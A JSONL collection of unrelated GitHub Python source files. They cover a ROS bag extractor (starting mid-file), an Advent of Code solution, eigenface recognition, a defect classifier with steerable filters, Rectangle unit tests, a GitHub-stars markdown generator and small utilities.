requester_LED_flag +\",\"+\\\n responder_LED_flag +\",\"+\\\n noise +\",\"+\\\n vPeak +\",\"+\\\n coarse_tof_in_bins +\",\"+\\\n uwb_time +\",\"+\\\n requester_locationx +\",\"+\\\n requester_locationy +\",\"+\\\n requester_locationz +\",\"+\\\n responder_locationx +\",\"+\\\n responder_locationy +\",\"+\\\n responder_locationz +\",\"+\\\n rqst_antenna_offsetx+\",\"+\\\n rqst_antenna_offsety+\",\"+\\\n rqst_antenna_offsetz+\",\"+\\\n rspd_antenna_offsetx+\",\"+\\\n rspd_antenna_offsety+\",\"+\\\n rspd_antenna_offsetz\n uwb.write(uwbData)\n uwb.write(\"\\n\")\n bag_to_read.close()\n\n return\n\ndef bag2gt(bag=str, gt_topic=str, output_folder=str):\n # support an gt topic\n\n print(\"Extract gt records from %s on topic %s into %s\" % (bag, gt_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n gt = open(os.path.join(output_folder,\"PoseStamped.txt\"),\"w\")\n for topic, msg, t in bag_to_read.read_messages(topics=gt_topic):\n\n pos_y = \"%.6f\" % msg.pose.position.y\n pos_x = \"%.6f\" % msg.pose.position.x\n pos_z = \"%.6f\" % msg.pose.position.z\n q_y = \"%.10f\" % msg.pose.orientation.y\n q_x = \"%.10f\" % msg.pose.orientation.x\n q_z = \"%.10f\" % msg.pose.orientation.z\n q_w = \"%.10f\" % msg.pose.orientation.w\n\n timestr=\"%.6f\"%(msg.header.stamp.to_sec())\n\n gtdata = timestr + \" \" + pos_x + \" \" + pos_y + \" \" + pos_z + \" \" + q_x + \" \" + q_y + \" \" + q_z + \" \" + q_w\n gt.write(gtdata)\n gt.write('\\n')\n bag_to_read.close()\n\n return\n\ndef main():\n parser = argparse.ArgumentParser(description='Extract a ROS bag containing multiple image and imu topics.')\n parser.add_argument('--bag', metavar='bag', help='ROS bag file')\n parser.add_argument('--image_topics', metavar='image_topics', nargs='*', help='Image topics %(default)s')\n parser.add_argument('--imu_topics', metavar='imu_topics', nargs='*', help='Imu topics %(default)s')\n parser.add_argument('--gnss_topics', metavar='gnss_topics', nargs='*', help='Gnss topics %(default)s')\n parser.add_argument('--uwb_topics', metavar='uwb_topics', nargs='*', help='Uwb topics %(default)s')\n parser.add_argument('--gt_topics', metavar='gt_topics', nargs='*', help='Gt topics %(default)s')\n parser.add_argument('--output_folder', metavar='output_folder', nargs='?', default=\"~/Desktop/\", help='Output folder %(default)s')\n\n args = parser.parse_args()\n print(\"Extract images from %s on topic %s into %s\" % (args.bag, args.image_topics, args.output_folder))\n #print help if no argument is specified\n if len(sys.argv)<2:\n parser.print_help()\n sys.exit(0)\n\n image_id=0\n if not args.image_topics is None:\n print(\"cam number: \"+str(len(args.image_topics)))\n for image_topic in args.image_topics:\n #create output folder\n try:\n output_folder=os.path.join(args.output_folder,\"img\"+str(image_id),\"data\")\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process cam \"+str(image_id)+\" (topic: \"+image_topic+\", path: \"+output_folder+\")\")\n bag2image(args.bag, image_topic, output_folder)\n image_id=image_id+1\n print(\"finish process cam \"+str(image_id)+\" (topic: \"+image_topic+\")\")\n else:\n print(\"-----WARNING: no cam topic given ! -----\")\n\n imu_id=0\n if not args.imu_topics is None:\n print(\"imu number: \"+str(len(args.imu_topics)))\n for imu_topic in args.imu_topics:\n output_folder=os.path.join(args.output_folder,\"imu\"+str(imu_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process imu \"+str(imu_id)+\" (topic: \"+imu_topic+\", path: \"+output_folder+\")\")\n bag2imu(args.bag, imu_topic, output_folder)\n imu_id=imu_id+1\n print(\"finish process imu \"+str(imu_id)+\" (topic: \"+imu_topic+\")\")\n else:\n print(\"-----WARNING: no imu topic given ! -----\")\n \n gnss_id=0\n if not args.gnss_topics is None:\n print(\"gnss number: \"+str(len(args.gnss_topics)))\n for gnss_topic in args.gnss_topics:\n output_folder=os.path.join(args.output_folder,\"gnss\"+str(gnss_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process gnss \"+str(gnss_id)+\" (topic: \"+gnss_topic+\", path: \"+output_folder+\")\")\n bag2gnss(args.bag, gnss_topic, output_folder)\n gnss_id=gnss_id+1\n print(\"finish process gnss \"+str(gnss_id)+\" (topic: \"+gnss_topic+\")\")\n else:\n print(\"-----WARNING: no gnss topic given ! -----\")\n\n uwb_id=0\n if not args.uwb_topics is None:\n print(\"uwb number: \"+str(len(args.uwb_topics)))\n for uwb_topic in args.uwb_topics:\n output_folder=os.path.join(args.output_folder,\"uwb\"+str(uwb_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process uwb \"+str(uwb_id)+\" (topic: \"+uwb_topic+\", path: \"+output_folder+\")\")\n bag2uwb(args.bag, uwb_topic, output_folder)\n uwb_id=uwb_id+1\n print(\"finish process uwb \"+str(uwb_id)+\" (topic: \"+uwb_topic+\")\")\n else:\n print(\"-----WARNING: no uwb topic given ! -----\")\n\n gt_id=0\n if not args.gt_topics is None:\n print(\"gt number: \"+str(len(args.gt_topics)))\n for gt_topic in args.gt_topics:\n output_folder=os.path.join(args.output_folder,\"gt\"+str(gt_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process gt \"+str(gt_id)+\" (topic: \"+gt_topic+\", path: \"+output_folder+\")\")\n bag2gt(args.bag, gt_topic, output_folder)\n gt_id=gt_id+1\n print(\"finish process gt \"+str(gt_id)+\" (topic: \"+gt_topic+\")\")\n else:\n print(\"-----WARNING: no gt topic given ! -----\")\n\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"zzwu29/bag_scripts","sub_path":"bag_extractor.py","file_name":"bag_extractor.py","file_ext":"py","file_size_in_byte":17582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26799987519","text":"currentDegrees = 0\neastPos = 0\nnorthPos = 0\n\ndef rotate(dir, degrees):\n global currentDegrees\n if dir == 'L':\n degrees = 360 - degrees\n currentDegrees += degrees\n currentDegrees = currentDegrees % 360\n\ndef move(dir, dist):\n global eastPos, northPos\n if dir == 'L' or dir == 'R':\n #print(\"rotating \" + dir + str(dist))\n rotate(dir, dist)\n #print(\"new degrees: \" + str(currentDegrees))\n return\n\n if dir == 'F':\n if currentDegrees == 90:\n dir = 'S'\n elif currentDegrees == 180:\n # This dumb W right here\n dir = 'W'\n elif currentDegrees == 270:\n dir = 'N'\n else:\n dir = 'E'\n\n if dir == 'N':\n #print(\"north \" + str(dist))\n northPos += dist\n elif dir == 'S':\n #print(\"south \" + str(dist))\n northPos -= dist\n elif dir == 'E':\n #print(\"east \" + str(dist))\n eastPos += dist\n elif dir == 'W':\n #print(\"west \" + str(dist))\n eastPos -= dist\n #print(\"(\" + str(eastPos) + \", \" + str(northPos) + \", \" + str(currentDegrees) + \")\")\n\nwith open(\"input.txt\") as input:\n for line in input:\n move(line[0], int(line[1:]))\n\nprint(abs(eastPos) + abs(northPos))\n","repo_name":"hrecker/AdventOfCode","sub_path":"2020/day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26163420537","text":"# a) Description:\n\n# b) Implementation: We start with two arrays, hunger_level and biscuit_size. First, we will sort these arrays with\n# Python's sort() function. Then, we need to initialize two variables: one that will hold the number of dogs that can\n# fed and a counter. Initialize both to 0. Then, we will iterate through both arrays to find the current positions of\n# both dog and biscuit. If the biscuit size is greater than or equal to the hunger level of the dog, then the dog is\n# able to be fed so we increment the number of dogs and continue to the next dog and next biscuit. However, if the\n# biscuit_index is at the same index of the hunger_level, we cannot feed any more dogs and we return our completed list\n# of dogs we can feed.\n\ndef feedDog(hunger_level, biscuit_size):\n \"\"\"\n This function computes the maximum number of hungry dogs by implementing a Greedy algorithm that finds the number\n of dogs we can satisfy. If a dog has hunger hunger_level[i], it can be satisfied only by taking a biscuit of size\n biscuit_size [j] >= hunger_level [i]\n \"\"\"\n\n hunger_level.sort()\n biscuit_size.sort()\n # make sure arrays are sorted\n\n num_dogs = 0\n num_bisc = 0\n\n length = len(hunger_level)\n\n for biscuit_index in biscuit_size:\n for hunger_index in range(num_bisc, length):\n # start to iterate through both of our arrays\n if hunger_level[hunger_index] <= biscuit_index:\n # if dog hunger index in d hunger array is > or = to the num of biscuits increment number of dogs and\n # counter\n num_dogs = num_dogs + 1\n num_bisc = num_bisc + 1\n elif length == hunger_index:\n # end of the index\n return num_dogs\n\n return num_dogs\n# return our final count\n\n\n\n################ TESTING PURPOSES #############\n# hunger_level =[1, 2, 3]\n# biscuit_size =[1, 1]\n# test = feedDog(hunger_level, biscuit_size)\n# print(test)\n\n\n\n# c) Time-Complexity:\n# Because I used Python's built in sort() method, the time-complexity is O(nLogn) also known as TimSort. I have included\n# citations below for reference:\n# https://www.geeksforgeeks.org/timsort/\n# https://medium.com/@rylanbauermeister/understanding-timsort-191c758a42f3\n","repo_name":"vzavala95/Algorithms","sub_path":"FeedDog.py","file_name":"FeedDog.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39561460657","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport imageio\nimport os\n\ndef load_images_from_folder(folder):\n \"\"\" load all images in the folder\n \"\"\"\n images = []\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename), cv2.IMREAD_GRAYSCALE)\n images.append(img)\n return images\n\nimages = load_images_from_folder('trainingset')\nimages = np.array(images)\ntrain_images = images\nn, h, w = images.shape\nd = h * w\nX = np.reshape(images, (n, d)).copy() # each row represents an image\n\ndef plot_image(image):\n \"\"\" Visualise an image using matplotlib\n \"\"\"\n image = np.reshape(image, (h, w))\n plt.figure(figsize=(4,4))\n plt.imshow(image, cmap='gray')\n #plt.savefig('../../Report/figures/fig_3.6_{}.eps'.format(i+1), dpi=100, format='eps')\n plt.show()\n\n# %% Calculate the mean face\nmean_face = np.mean(X, axis=0)\nplot_image(mean_face)\n\n# %% Subtract the mean face\nA = X - mean_face\n\n# %% Compute covariance matrix\ncov_matrix = A @ A.T\ncov_matrix /= n\neigenvalues, eigenvectors = np.linalg.eig(cov_matrix)\neigenvectors = A.T @ eigenvectors\n# sort in descending order\nsort_indices = eigenvalues.argsort()[::-1]\neigenvalues = eigenvalues[sort_indices]\neigenvectors = eigenvectors[:,sort_indices]\n# Choose top k eigenvectors\nk = 10\neigenvalues = eigenvalues[:k]\neigenvectors = eigenvectors[:,:k]\nnorms = np.linalg.norm(eigenvectors, axis=0)\neigenvectors /= norms\nweights = eigenvectors.T @ X.T\n\n# %% Visualise the top eigenfaces\nfor i in range(k):\n plot_image(np.real(eigenvectors.T[i]))\n\n# %% Find the top 3 closest image to images in the test set\n\ntest_images = load_images_from_folder('testset')\n# test_images = load_images_from_folder('mytestset') # Use my own images\ntest_images = np.array(test_images)\nn, h, w = test_images.shape\nd = w * h\ntest_images = np.reshape(test_images, (n, d))\ni = 0\nfor image in test_images:\n plot_image(image)\n A_unknown = image - mean_face\n W_unknown = eigenvectors.T @ image\n diff = weights.T - W_unknown\n norms = np.linalg.norm(diff, axis=1)\n nearest = np.argsort(norms)[:3]\n plt.figure(figsize=(7,3))\n for j in range(3):\n image = train_images[nearest[j]]\n ax = plt.subplot(1, 3, j+1)\n ax.imshow(image, cmap='gray')\n #plt.savefig('../../Report/figures/fig_3.6_{}o.eps'.format(i+1), dpi=100, format='eps')\n plt.show()\n i += 1\n print('')\n","repo_name":"ernestkck/computer-vision-lab","sub_path":"Task3/Yale-FaceA/eigenface.py","file_name":"eigenface.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2135418034","text":"#!/usr/bin/python3\n\"\"\"\nTest rectangle\n\"\"\"\nimport unittest\nimport os\nfrom models.rectangle import Rectangle\nfrom models.base import Base\nfrom io import StringIO\nfrom contextlib import redirect_stdout\n\nclass Test_Rectangle(unittest.TestCase):\n def test_init(self):\n \"\"\"\n Test instance attributes\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(r.id, 18)\n self.assertEqual(r.width, 8)\n self.assertEqual(r.height, 6)\n self.assertEqual(r.x, 4)\n self.assertEqual(r.y, 2)\n r = Rectangle(1, 2)\n self.assertEqual(r.width, 1)\n self.assertEqual(r.height, 2)\n\n def test_type_error_init(self):\n \"\"\"\n Test TypeError\n \"\"\"\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(\"8\", 6, 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"width must be an integer\")\n\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(8, \"6\", 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"height must be an integer\")\n\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(8, 6, \"4\", 2, 18)\n\n self.assertEqual(str(cm.exception), \"x must be an integer\")\n\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(8, 6, 4, \"2\", 18)\n\n self.assertEqual(str(cm.exception), \"y must be an integer\")\n\n def test_value_error_init(self):\n \"\"\"\n Test ValueError\n \"\"\"\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(-8, 6, 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"width must be > 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(8, -6, 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"height must be > 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(8, 6, -4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"x must be >= 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(8, 6, 4, -2, 18)\n\n self.assertEqual(str(cm.exception), \"y must be >= 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(0, 2)\n\n self.assertEqual(str(cm.exception), \"width must be > 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(1, 0)\n\n self.assertEqual(str(cm.exception), \"height must be > 0\")\n\n def test_area(self):\n \"\"\"\n Test area\n \"\"\"\n r2 = Rectangle(3, 2)\n self.assertEqual(r2.area(), 6)\n\n def test_str(self):\n \"\"\"\n Test str\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(str(r), \"[Rectangle] (18) 4/2 - 8/6\")\n\n def test_display(self):\n \"\"\"\n Test display rectangle\n \"\"\"\n r3 = Rectangle(3, 2)\n expected_output = \"###\\n###\\n\"\n with StringIO() as buffer, redirect_stdout(buffer):\n r3.display()\n result = buffer.getvalue()\n self.assertEqual(result, expected_output)\n\n r3 = Rectangle(3, 2, 1, 1)\n expected_output = \"\\n ###\\n ###\\n\"\n with StringIO() as buffer, redirect_stdout(buffer):\n r3.display()\n result = buffer.getvalue()\n self.assertEqual(result, expected_output)\n\n def test_update(self):\n \"\"\"\n Test update\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n r.update(89, 10, 10, 10, 10)\n self.assertEqual(r.id, 89)\n self.assertEqual(r.width, 10)\n self.assertEqual(r.height, 10)\n self.assertEqual(r.x, 10)\n self.assertEqual(r.y, 10)\n\n def test_dictionary(self):\n \"\"\"\n Test dictionary\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(r.to_dictionary(), { \"id\": 18, \"width\": 8, \"height\": 6,\n \"x\": 4, \"y\": 2})\n\n def test_create(self):\n \"\"\"\n Test create\n \"\"\"\n r = Rectangle.create(**{\"id\": 18, \"width\": 8, \"height\": 6,\n \"x\": 4, \"y\": 2})\n res = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(str(r), str(res))\n\n r = Rectangle.create(**{\"id\": 18, \"width\": 8, \"height\": 6})\n res = Rectangle(8, 6, 0, 0, 18)\n self.assertEqual(str(r), str(res))\n\n r = Rectangle.create(**{\"id\": 18, \"width\": 8,\n \"height\": 6, \"x\": 4})\n res = Rectangle(8, 6, 4, 0, 18)\n self.assertEqual(str(r), str(res))\n\n\n def test_save_to_file(self):\n \"\"\"\n Test save file\n \"\"\"\n r = Rectangle(2, 4, 0, 0, 18)\n Rectangle.save_to_file([r])\n with open(\"Rectangle.json\", \"r\") as f:\n data_read = f.read()\n expect_output = '[{\"id\": 18, \"width\": 2, \"height\": 4, \"x\": 0, \"y\": 0}]'\n self.assertEqual(data_read, expect_output)\n os.remove(\"Rectangle.json\")\n\n Rectangle.save_to_file([])\n with open(\"Rectangle.json\", \"r\") as f:\n data_read = f.read()\n expect_output = '[]'\n self.assertEqual(data_read, expect_output)\n os.remove(\"Rectangle.json\")\n\n Rectangle.save_to_file(None)\n with open(\"Rectangle.json\", \"r\") as f:\n data_read = f.read()\n expect_output = '[]'\n self.assertEqual(data_read, expect_output)\n os.remove(\"Rectangle.json\")\n\n def test_load_from_file(self):\n \"\"\"\n Test load file\n \"\"\"\n r1 = Rectangle(4, 6)\n Rectangle.save_to_file([r1])\n rectangles = Rectangle.load_from_file()\n self.assertIsInstance(rectangles[0], Rectangle)\n self.assertEqual(rectangles[0].width, 4)\n self.assertEqual(rectangles[0].height, 6)\n os.remove(\"Rectangle.json\")\n\n r = Rectangle.load_from_file()\n self.assertTrue(isinstance(r, list))\n self.assertEqual(r, [])\n","repo_name":"CllaudiaB/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/tests/test_models/test_rectangle.py","file_name":"test_rectangle.py","file_ext":"py","file_size_in_byte":5909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"20686941157","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom datetime import datetime\nfrom string import Template\n\nimport httpx\n\nHEADERS = {\n \"Accept\": \"application/vnd.github.v3+json\",\n \"Authorization\": f\"token {os.getenv('GITHUB_TOKEN')}\",\n}\n\n\ntpl = Template(\n \"\"\"# Awesome Stars\n\n \n\n## Table of Contents\n\n$toc\n$contents\n\"\"\"\n)\n\n\ndef get_all_stars():\n \"\"\"\n Get all stars from GitHub API\n \"\"\"\n # https://docs.github.com/cn/rest/activity/starring\n # url = \"https://api.github.com/user/starred\"\n url = f\"https://api.github.com/users/{os.getenv('USERNAME')}/starred\"\n params = {\"per_page\": 100}\n\n res = httpx.get(url, params=params, headers=HEADERS)\n print(f\"Total pages: {res.links['last']['url']}\\n\", file=sys.stderr)\n\n stars = []\n while \"next\" in res.links.keys():\n url = res.links[\"next\"][\"url\"]\n print(\n f\"> Getting: {url}, X-RateLimit-Used: {res.headers['X-RateLimit-Used']}\",\n file=sys.stderr,\n )\n res = httpx.get(url, params=params, headers=HEADERS)\n stars.extend(res.json())\n\n return stars\n\n\ndef get_repos_by_language(stars):\n \"\"\"\n Group repos by language\n \"\"\"\n repos_by_language = {}\n for s in stars:\n language = s[\"language\"] or \"Others\"\n description = s[\"description\"]\n description = description.replace(\"\\n\", \"\").strip() if description else \"\"\n\n if language not in repos_by_language:\n repos_by_language[language] = []\n\n repos_by_language[language].append(\n [\n s[\"full_name\"],\n s[\"html_url\"],\n s[\"stargazers_count\"],\n description,\n ]\n )\n\n repos_by_language = dict(\n sorted(repos_by_language.items(), key=lambda item: item[0])\n )\n return repos_by_language\n\n\ndef make_md(repos_by_language):\n \"\"\"\n Make markdown\n \"\"\"\n toc = \"\"\n for language in repos_by_language.keys():\n toc += f\"- [{language}](#{'-'.join(language.lower().split())})\\n\"\n\n contents = \"\"\n for language, repos in repos_by_language.items():\n contents += f\"## {language}\\n\\n\"\n for repo in repos:\n contents += \"- [{}]({}) - `★{}` {}\\n\".format(*repo)\n contents += \"\\n\"\n\n md = tpl.substitute(\n total=len(stars),\n updated=datetime.now().strftime(\"%Y--%m--%d\"),\n toc=toc,\n contents=contents,\n ).strip()\n\n return md\n\n\nif __name__ == \"__main__\":\n stars = get_all_stars()\n repos_by_language = get_repos_by_language(stars)\n md = make_md(repos_by_language)\n print(md)\n","repo_name":"sunlei/awesome-stars","sub_path":"starred.py","file_name":"starred.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"20609224372","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 24 17:45:03 2022\n\n@author: arun\n\"\"\"\nimport argparse\nimport numpy as np\nfrom cv2 import imread, resize\nfrom sklearn import preprocessing\nimport os\nimport pickle\nimport math\nfrom cv2 import imshow, waitKey, destroyAllWindows, filter2D, imread, resize\nfrom theano.tensor.signal import pool\nfrom theano import tensor as T\nfrom theano import function\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\n#%%\ndef imageMaxPool(img):\n\n my_dmatrix = T.TensorType('uint8', (False,)*2)\n input = my_dmatrix('input')\n maxpool_shape = (30, 40)\n pool_out = pool.pool_2d(input, maxpool_shape, ignore_border=True)\n f = function([input],pool_out)\n\n #invals = numpy.random.RandomState(1).rand(3, 2, 5, 5)\n invals = img\n output = f(invals)\n return output\n\n\ndef showPicture(img):\n imshow('image',img)\n print(\"Showing Picture\")\n waitKey(0)\n destroyAllWindows()\n\n\ndef centeredFilter(N):\n mask_shell = np.empty((N, N), dtype=np.object)\n num = N//2\n y = num\n x = -1 * num\n countX = 0\n countY = 0\n\n for j in mask_shell: # interate over rows\n for i in j: # interate over elements\n mask_shell[countX][countY] = [x,y]\n x = x + 1\n countY = countY + 1\n y = y - 1\n x = -1 * num\n countY = 0\n countX = countX + 1\n\n return mask_shell\n\n\ndef steerableGaussian(img, theta, kernel_size):\n G2A_array = np.empty((kernel_size, kernel_size))\n G2B_array = np.empty((kernel_size, kernel_size))\n G2C_array = np.empty((kernel_size, kernel_size))\n countX = 0\n countY = 0\n # Calculate G2A - in array not normalized\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n G2A = 0.9213*(2*(XY[0]*XY[0])-1)*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n G2A_array[countX][countY] = G2A\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n\n G2A_array = (math.cos(theta)*math.cos(theta))*G2A_array\n\n R2A = filter2D(img, -1, G2A_array)\n\n # Reset index variables\n countX = 0\n countY = 0\n # Calculate G2B - in array not normalized\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n G2B = 1.843*(XY[0]*XY[1])*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n G2B_array[countX][countY] = G2B\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n G2B_array = (-2*math.cos(theta)*math.sin(theta))*G2B_array\n\n R2B = filter2D(img, -1, G2B_array)\n\n # Reset index variables\n countX = 0\n countY = 0\n # Calculate G2A - in array not normalized\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n G2C = 0.9213*(2*(XY[1]*XY[1])-1)*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n G2C_array[countX][countY] = G2C\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n G2C_array = (math.sin(theta)*math.sin(theta))*G2C_array\n R2C = filter2D(img, -1, G2C_array)\n addAB = np.add(R2A,R2B)\n F_theta = np.add(R2C,addAB)\n\n # showPicture(F_theta)\n\n return F_theta\n\n\ndef steerableHilbert(img,theta,kernel_size):\n\n H2A_array = np.empty((kernel_size,kernel_size))\n H2B_array = np.empty((kernel_size,kernel_size))\n H2C_array = np.empty((kernel_size,kernel_size))\n H2D_array = np.empty((kernel_size,kernel_size))\n\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2A = 0.9780*((-2.254*XY[0])+(XY[0]*XY[0]*XY[0]))*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2A_array[countX][countY] = H2A\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n\n H2A_array = (math.cos(theta)*math.cos(theta)*math.cos(theta))*H2A_array\n R2A = filter2D(img, -1, H2A_array)\n # R2A_LC = (math.cos(theta)*math.cos(theta))*R2A\n\n #showPicture(R2A)\n\n # Reset index variables\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2B = 0.9780*(-0.7515+(XY[0]*XY[0]))*XY[1]*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2B_array[countX][countY] = H2B\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n # print(H2B_array)\n\n H2B_array = (-3*math.cos(theta)*math.cos(theta)*math.sin(theta))*H2B_array\n\n R2B = filter2D(img, -1, H2B_array)\n\n #showPicture(R2B)\n\n # Reset index variables\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2C = 0.9780*(-0.7515+(XY[1]*XY[1]))*XY[0]*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2C_array[countX][countY] = H2C\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n H2C_array = (3*math.cos(theta)*math.sin(theta)*math.sin(theta))*H2C_array\n\n R2C = filter2D(img, -1, H2C_array)\n # Reset index variables\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2D = 0.9780*((-2.254*XY[1])+(XY[1]*XY[1]*XY[1]))*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2D_array[countX][countY] = H2D\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n H2D_array = (-1*math.sin(theta)*math.sin(theta)*math.sin(theta))*H2D_array\n R2D = filter2D(img, -1, H2D_array)\n addAB = np.add(R2A, R2B)\n addABC = np.add(R2C, addAB)\n F_theta = np.add(R2D, addABC)\n\n # showPicture(F_theta)\n\n return F_theta\n\n#%%\n\nif __name__ == '__main__':\n # file_name = \"/home/arun/Documents/PyWSPrecision/Defect_Classification-main/Dataset/test/test_mould_2.jpg\"\n \n Datadir=os.path.join(os.getcwd(),'TestData')\n \n files = os.listdir(Datadir)\n \n file_index=np.random.choice(len(files))\n \n file_name=files[file_index]\n \n file_name=os.path.join(Datadir,file_name)\n \n kernel_size = 5\n theta_list = [0, 45, 90, 135, 180, 225, 270, 315]\n\n class_labels = np.load(\"defect_class_labels.npy\")\n dataset = np.load(\"defect_dataset.npy\")\n dataset_14400 = np.load(\"defect_dataset_14400.npy\")\n # classes_name = pickle.load(\"defect_classes.pkl\")\n with open(\"defect_classes.pkl\", 'rb') as file:\n classes_name = pickle.load(file)\n \n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image\", help=\"path to image to classify\")\n args = parser.parse_args()\n\n if args.image:\n file_name = args.image\n\n img = imread(file_name, 0)\n img = resize(img, (1200, 900))\n feature_maps = []\n for theta in theta_list:\n feature_maps.append(steerableGaussian(img, theta, kernel_size))\n feature_maps.append(steerableHilbert(img, theta, kernel_size))\n\n lda_input = np.array([], dtype=np.uint8)\n for feature_map in feature_maps:\n pooled = imageMaxPool(feature_map)\n lda_input = np.append(lda_input,pooled)\n\n lda_input = np.resize(lda_input,(1, 14400))\n\n lda = LinearDiscriminantAnalysis(n_components=1)\n reduced = lda.fit(dataset_14400, class_labels).transform(lda_input)\n print(reduced)\n\n scaler = preprocessing.StandardScaler().fit(dataset)\n scaler.transform(reduced)\n\n with open(\"svm_class_model.pkl\", 'rb') as file:\n clf = pickle.load(file)\n \n score=clf.predict(reduced)\n class_predict=classes_name[int(score)]\n print('Predicted Class index: %s Class Name: %s'%(score,class_predict))\n","repo_name":"duraiarun-p/SurveyTek","sub_path":"Defect_SVM/Defect_Classifier.py","file_name":"Defect_Classifier.py","file_ext":"py","file_size_in_byte":7452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25507921571","text":"from typing import List\n\n\ndef remove_duplicates(nums: List[int]) -> int:\n dct = {}\n i = len(nums)\n if i == 0:\n return 0\n while i > 0:\n if nums[i - 1] in dct:\n nums.remove(nums[i - 1])\n i -= 1\n continue\n dct[nums[i - 1]] = \"\"\n i -= 1\n return len(nums)\n\n\nprint(remove_duplicates([1,1,2,3,4,4,4,4]))","repo_name":"yunior123/solving_leetcode_python","sub_path":"remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35430075186","text":"from article.models import Tag, Category, BigCategory,Article,Banner\r\n\r\n\r\n# 全局变量\r\ndef all_template(request):\r\n tags = Tag.objects.all()\r\n nodes = BigCategory.objects.all()\r\n view_articles = Article.objects.all().order_by('-views')[:5]\r\n banners = Banner.objects.all()\r\n love_articles = Article.objects.all().order_by('-loves')[:3]\r\n # for node in nodes:\r\n # node.category_set.\r\n context = {'nodes': nodes, 'tags': tags,'view_articles': view_articles, 'love_articles': love_articles,'banners': banners}\r\n return context\r\n","repo_name":"LuGebuhuixiao/bloglu","sub_path":"lublog/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
